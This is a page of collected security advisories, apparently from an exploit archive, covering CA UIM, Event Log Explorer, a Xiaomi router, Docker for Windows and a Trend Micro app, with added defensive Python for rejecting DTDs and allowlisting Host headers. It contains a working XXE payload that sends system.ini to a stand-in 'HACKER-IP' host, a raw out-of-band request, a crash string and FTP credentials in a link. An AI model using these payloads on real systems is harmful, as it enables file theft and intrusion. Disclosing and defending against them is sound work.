CA20180829-02: Security Notice for CA Unified Infrastructure Management

Issued: August 29, 2018
Last Updated: August 29, 2018

CA Technologies Support is alerting customers to multiple potential
risks with CA Unified Infrastructure Management. Multiple
vulnerabilities exist that can allow an attacker, who has access to
the network on which CA UIM is running, to run arbitrary CA UIM
commands on machines where the CA UIM probes are running. An attacker
can also gain access to other machines running CA UIM and access the
filesystems of those machines.

The first vulnerability, CVE-2018-13819, has a medium risk rating and
concerns a hardcoded secret key, which can allow an attacker to access
sensitive information.

The second vulnerability, CVE-2018-13820, has a medium risk rating and
concerns a hardcoded passphrase, which can allow an attacker to access
sensitive information.

The third vulnerability, CVE-2018-13821, has a high risk rating and
concerns a lack of authentication, which can allow a remote attacker
to conduct a variety of attacks, including file reading/writing.


Risk Rating

Cumulative risk rating of High.


Platform(s)

All supported platforms


Affected Products

CA Unified Infrastructure Management 8.5.1, 8.5, 8.4.7


Unaffected Products

CA Unified Infrastructure Management 8.5.1, 8.5, 8.4.7 with the
solutions listed below applied.


How to determine if the installation is affected

Review the UIM Vulnerability Patch 1 documentation [1] to determine if
all appropriate patches have been applied. Additionally, review
KB000111575: CA UIM Best Practices For Secure Environments [2] and CA
UIM Best Practices for Securing Environments to mitigate
CVE-2018-13821 [3] to ensure that all best practices have been
implemented.


Solution

Two solutions are available for CA UIM 8.5.1, CA UIM 8.5, and CA UIM
8.4.7 to resolve these vulnerabilities. Both solutions, UIM
Vulnerability Patch 1, and UIM Best Practices for Secure Environments,
must be implemented to effectively mitigate all three vulnerabilities.

* CA recommends installing UIM Vulnerability Patch 1 [1] to resolve
CVE-2018-13819 and CVE-2018-13820 as soon as possible. From the
download link, select the directory that corresponds to your release
to access the patch package.

* CA recommends securing the CA UIM deployment using the best
practices described in KB000111575: CA UIM Best Practices For Secure
Environments [2] and CA UIM Best Practices for Securing Environments
to mitigate CVE-2018-13821 [3].

-OR-

If you feel the best practice recommendations are insufficient for
your specific security needs, please contact CA Support to install and
configure the CA UIM Secure Bus 8.01.

Note: While the secured version of the message bus has additional
security features (e.g. encrypting all UIM traffic from robot to hub),
the implementation requires additional prerequisites (such as
requiring user-provided, signed X.509 certificates) and may have
reduced functionality compared to the standard message bus.

Customers running any End of Service (EOS) release are strongly
advised to upgrade to version 8.5.1 and take the remediation actions
listed above to resolve the vulnerabilities immediately.

For the most up-to-date information about these CA Unified
Infrastructure Management vulnerabilities, and for other important
product information, please see the CA Unified Infrastructure
Management Support page [4].


References

CVE-2018-13819 - CA UIM hardcoded secret key
CVE-2018-13820 - CA UIM hardcoded passphrase
CVE-2018-13821 - CA UIM lack of authentication
[1] ftp://UIMuser:CnIa24uJ@ftp.ca.com/Important Hotfixes/UIM Vulnerability Patch 1/
[2] https://comm.support.ca.com/kb/ca-uim-best-practices-for-secure-environments/kb000111575
[3] https://support.ca.com/phpdocs/7/8384/8384-critical-alert-0716-2016.pdf
[4] https://support.ca.com/us/product-information/ca-unified-infrastructure-management.html

Acknowledgement

CVE-2018-13819 - Oystein Middelthun
CVE-2018-13820 - Oystein Middelthun
CVE-2018-13821 - Oystein Middelthun


Change History

Version 1.0: 2018-08-29 - Initial Release


Customers who require additional information about this notice may
contact CA Technologies Support at https://support.ca.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at vuln <AT> ca.com

Security Notices and PGP key
support.ca.com/irj/portal/anonymous/phpsbpldgpg
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Regards,
Ken Williams
Vulnerability Response Director, Product Vulnerability Response Team
CA Technologies | 520 Madison Avenue, 22nd Floor, New York NY 10022


Copyright (c) 2018 CA. 520 Madison Avenue, 22nd Floor, New York, NY
10022. All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.



Linux reiserfs listxattr_filler() Heap Overflow

FsPro Labs Event Log Explorer 4.6.1.2115 XML Injection


FsPro Labs Event Log Explorer version 4.6.1.2115 suffers from an XML external entity injection vulnerability.


MD5 | fad943a0c32935b55f0eee3696caaca4

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/FSPRO-LABS-EVENT-LOG-EXPLORER-XML-INJECTION-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec

Greetz: indoushka | Eduardo


[Vendor]
www.eventlogxp.com


[Product]
Event Log Explorer v4.6.1.2115

Event Log Explorer is an effective software solution for viewing, analyzing and monitoring events recorded in Microsoft Windows event logs.


[Vulnerability Type]
XML External Entity Injection


[Affected Component]
elex.exe


[CVE Reference]
CVE-2018-16252


[Security Issue]
Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers can potentially gain access to local files.


[Impact]
Information Disclosure


[Exploit/POC]
python -m SimpleHTTPServer

"test.elx"

<?xml version="1.0"?>
<!DOCTYPE gga [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>


"payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://HACKER-IP:8000?%file;'>">
%all;


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: August 19, 2018
Vendor created ticket: August 19, 2018
No further replies
September 1, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
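The .ELX document in the PoC is plain XML carrying an inline DTD, and that DTD is what lets a parser fetch payload.dtd and then place the contents of system.ini into a URL it requests. On the consuming side the standard mitigation is to refuse any DTD before the document reaches the parser at all. The Python below is an added example written for this page, not code from the advisory or from Event Log Explorer: it walks the prolog of an untrusted document, reports DOCTYPE, SYSTEM/PUBLIC entity and parameter-entity constructs, and parses only DTD-free input. The two PoC files above are reproduced verbatim as test input; the benign document and its element names are constructed and do not reflect the real .ELX schema.

```python
"""Pre-parse DTD gate for XML documents such as the .ELX files above.
Added example (not code from the advisory or from Event Log Explorer): scan an untrusted
document's prolog for a DOCTYPE, external (SYSTEM/PUBLIC) entities and parameter-entity
use, and refuse to parse when any are present."""
import re
import xml.etree.ElementTree as ET

_KEYWORD = re.compile(r"<!([A-Za-z]*)")
_ENTITY_HEAD = re.compile(r"<!ENTITY\s+(%\s*)?([^\s>]+)")
_EXTERNAL_ID = re.compile(r"\b(SYSTEM|PUBLIC)\b")
_PE_REF = re.compile(r"%([A-Za-z_][\w.\-]*);")
_QUOTED = re.compile(r'"[^"]*"|\'[^\']*\'')


def _unquoted(s):
    # Blank quoted literals (length-preserving) so entity values are never read as markup.
    return _QUOTED.sub(lambda m: " " * len(m.group()), s)


def _declarations(text):
    """Return each top-level '<!...>' declaration; quotes, comments and '[...]' nesting are
    honoured so a '>' inside an entity value or a DOCTYPE internal subset does not end it."""
    decls, i, n = [], 0, len(text)
    while (start := text.find("<!", i)) >= 0:
        if text.startswith("<!--", start):             # top-level comment: skip it
            end = text.find("-->", start + 4)
            i = n if end < 0 else end + 3
            continue
        j, quote, depth = start + 2, None, 0
        while j < n:
            c = text[j]
            if quote:
                quote = None if c == quote else quote
            elif text.startswith("<!--", j):           # comment inside an internal subset
                end = text.find("-->", j + 4)
                j = n if end < 0 else end + 2          # the j += 1 below lands after '-->'
            elif c in "\"'":
                quote = c
            elif c in "[]":
                depth += 1 if c == "[" else -1
            elif c == ">" and depth <= 0:
                break
            j += 1
        decls.append(text[start:j + 1])
        i = j + 1
    return decls


def _audit_entity(decl, findings):
    """Record what an <!ENTITY ...> declaration would make a parser do."""
    m = _ENTITY_HEAD.match(decl)
    if not m:                                          # e.g. '<!ENTITY>' with no name
        return findings.append("malformed ENTITY declaration")
    label = ("%" if m.group(1) else "&") + m.group(2) + ";"
    body = decl[m.end():]
    literals = [lit[1:-1] for lit in _QUOTED.findall(body)]
    if _EXTERNAL_ID.search(_unquoted(body)):          # SYSTEM/PUBLIC outside quotes
        findings.append(f"external entity {label} -> {literals[-1] if literals else '?'}")
    elif m.group(1):
        findings.append(f"parameter entity {label} declared")
    if any("<!ENTITY" in lit.upper() for lit in literals):
        findings.append(f"entity {label} value embeds a nested ENTITY declaration")


def audit_xml_dtd(text):
    """Return human-readable findings for risky DTD constructs; [] means none."""
    findings = []
    for decl in _declarations(text):
        keyword = _KEYWORD.match(decl).group(1).upper()
        if keyword == "DOCTYPE":
            cut = _unquoted(decl).find("[")            # start of the internal subset, if any
            header, subset = (decl, "") if cut < 0 else (decl[:cut], decl[cut + 1:decl.rfind("]")])
            findings.append("DOCTYPE loads an external DTD" if _EXTERNAL_ID.search(_unquoted(header))
                            else "DOCTYPE declaration present")
            for inner in _declarations(subset):
                if inner.upper().startswith("<!ENTITY"):
                    _audit_entity(inner, findings)
            for ref in _PE_REF.findall(_unquoted(subset)):
                findings.append(f"parameter entity reference %{ref}; expanded in internal subset")
        elif keyword == "ENTITY":                      # stand-alone DTD file such as payload.dtd
            _audit_entity(decl, findings)
    return findings


def load_untrusted_xml(text):
    """Parse only documents that carry no DTD at all (the disallow-DOCTYPE rule)."""
    findings = audit_xml_dtd(text)
    if findings:
        raise ValueError("refusing to parse: " + "; ".join(findings))
    return ET.fromstring(text)


# The two PoC files from the advisory above, reproduced verbatim as test input.
MALICIOUS_ELX = r"""<?xml version="1.0"?>
<!DOCTYPE gga [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>"""
MALICIOUS_DTD = """<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://HACKER-IP:8000?%file;'>">
%all;"""
# Constructed benign document; the element names are made up, not a real .ELX schema.
BENIGN_ELX = '<?xml version="1.0"?><eventlog server="dc01.example.internal"><filter eventid="4625"/></eventlog>'
```

Rejecting any DOCTYPE at all is deliberate: a document format that never needs a DTD gains nothing from one, and refusing it up front does not depend on whichever entity-resolution defaults the XML library happens to ship with. The audit run on test.elx names both SYSTEM entities and the %dtd; reference that triggers the fetch, and run on payload.dtd it flags the parameter entity whose value smuggles in a second ENTITY declaration. For formats that legitimately carry a DTD, the same findings list can be filtered to reject only the external and parameter-entity entries.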

MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load


An out-of-band resource load issue was discovered on Xiaomi MIWiFi Xiaomi_55DD version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.


MD5 | 6ac1762d0861842f9b5cefc05f6c1c0e

CVE: CVE-2018-16307
Issue: Out-of-band resource load
Product affected: MIWiFi Xiaomi_55DD Version 2.8.50

Summary:
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.

## Request

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.1/cgi-bin/luci/web/home
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Cookie: __guid=86847064.3826147368769525000.1535781606575.13; monitor_count=9; psp=admin|||2|||0
Connection: close

username=admin&password=b2e8d6e552db587f3c283ce59c4d08fcbaf2cc9e&logtype=2&nonce=0_4c%3Abb%3A58%3A47%3A39%3A84_1535785091_2732

## Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 62
Connection: close
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
MiCGI-Switch: 1 0
MiCGI-TproxyInfo: 192.168.31.1:80
MiCGI-Upstream: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Client-Ip: 192.168.31.237
MiCGI-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Http-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Server-Ip: 192.168.31.1
MiCGI-Server-Port: 80
MiCGI-Status: AUTOPROXY
MiCGI-Preload: no

<html><body>x4e809xt6zpgky5b16f6dezjlglgkugifigz</body></html>
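The response headers above (MiCGI-Status: AUTOPROXY, with MiCGI-Upstream set to the client-supplied Host value) show the router's CGI front end choosing an upstream straight from the Host header. As an added example, not Xiaomi code, the following Python shows the check a device web server should make before any routing decision, and runs the same check over constructed access-log lines so that requests carrying a foreign Host value stand out. The allowlist entry router.example.internal and the five-field log format are assumptions; the LAN address, client address, path and collaborator hostname are taken from the advisory.

```python
"""Host-header allowlisting for a device web UI, plus log triage for the symptom above.
Added example, not Xiaomi firmware code: the router answered a request whose Host header
named an arbitrary external domain by proxying to it.  Routing must only ever consult a
Host value that names the device itself; the same check finds such requests in logs."""
import ipaddress

# Constructed allowlist: the LAN address from the advisory plus a hypothetical local name.
ALLOWED_HOSTS = {"192.168.31.1", "router.example.internal"}


def normalise_host(host_header):
    """Host part of a Host header: port and IPv6 brackets removed, lower-cased,
    trailing dot stripped, IP literals canonicalised.  '' if nothing usable."""
    value = host_header.strip()
    if value.startswith("["):                      # IPv6 literal such as [fe80::1]:80
        end = value.find("]")
        host = value[1:end] if end > 0 else ""
    elif value.count(":") == 1:                    # name-or-IPv4:port
        host = value.partition(":")[0]
    else:                                          # no port (or an invalid bare IPv6)
        host = value
    host = host.lower().rstrip(".")
    try:
        return str(ipaddress.ip_address(host))     # e.g. fe80:0:0::1 -> fe80::1
    except ValueError:
        return host


def host_is_allowed(host_header, allowed=ALLOWED_HOSTS):
    """True only when the Host header names this device; a router should answer
    anything else with 400 or 421 and never derive an upstream from it."""
    host = normalise_host(host_header)
    return bool(host) and host in {normalise_host(a) for a in allowed}


# Constructed access-log lines ("client method path host status"), modelled on the
# advisory's traffic; the second line is the request it shows.
SAMPLE_LOG = """\
192.168.31.237 GET /cgi-bin/luci/web/home 192.168.31.1 200
192.168.31.237 POST /cgi-bin/luci/api/xqsystem/login j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net 200
192.168.31.50 GET /cgi-bin/luci/web/home Router.Example.Internal.:80 200
192.168.31.50 GET / [fe80::1]:80 200
"""


def triage_hosts(log_text, allowed=ALLOWED_HOSTS):
    """Return (client, host) pairs for requests whose Host header did not name the device."""
    flagged = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) == 5 and not host_is_allowed(fields[3], allowed):
            flagged.append((fields[0], normalise_host(fields[3])))
    return flagged
```

The normalisation step matters as much as the allowlist: a check that compares the raw header string would let "192.168.31.1:80", a trailing-dot hostname or a differently written IPv6 literal slip past, while the canonicalised form compares cleanly. On the detection side, a device that logs the Host header makes this class of abuse visible as a burst of requests from LAN clients whose Host is neither the router's address nor its local name.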


Docker for Windows CVE-2018-15514 Remote Privilege Escalation Vulnerability



Docker for Windows is prone to a remote privilege-escalation vulnerability.
A remote attacker can exploit this issue to gain elevated privileges.
Versions prior to Docker for Windows 18.06.0-ce-rc3 are vulnerable.

Information

Bugtraq ID: 105202
Class: Design Error
CVE: CVE-2018-15514

Remote: Yes
Local: No
Published: Aug 31 2018 12:00AM
Updated: Aug 31 2018 12:00AM
Credit: Source Incite
Vulnerable: Docker Docker for Windows 18.06.0-ce-rc2
Docker Docker for Windows 18.06.0-ce-rc1
Docker Docker for Windows 18.05.0-ce-rc1
Docker Docker for Windows 18.05.0-ce


Not Vulnerable: Docker Docker for Windows 18.06.0-ce-rc3


Exploit


The researcher who discovered this issue has created a proof-of-concept. Please see the references for more information.


Trend Micro Virtual Mobile Infrastructure 5.5.1336 Denial Of Service

Trend Micro Virtual Mobile Infrastructure version 5.5.1336 suffers from a denial of service vulnerability.


MD5 | b24a5ac92ac76bced4355c49e1edbc73

# Exploit Title: Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-01
# Vendor Homepage: http://www.trendmicro.com.tr/media/ds/virtual-mobile-infrastructure-datasheet-en.pdf
# Software Link: App Store for iOS devices
# Tested Version: 5.5.1336
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Virtual_Mobile_Infrastructure_5.5.1336.py
# 2.- Copy content to clipboard
# 3.- Open App Virtual Mobile Infrastructure
# 4.- Paste ClipBoard on "Server address"
# 5.- Next
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 15000
print (buffer)

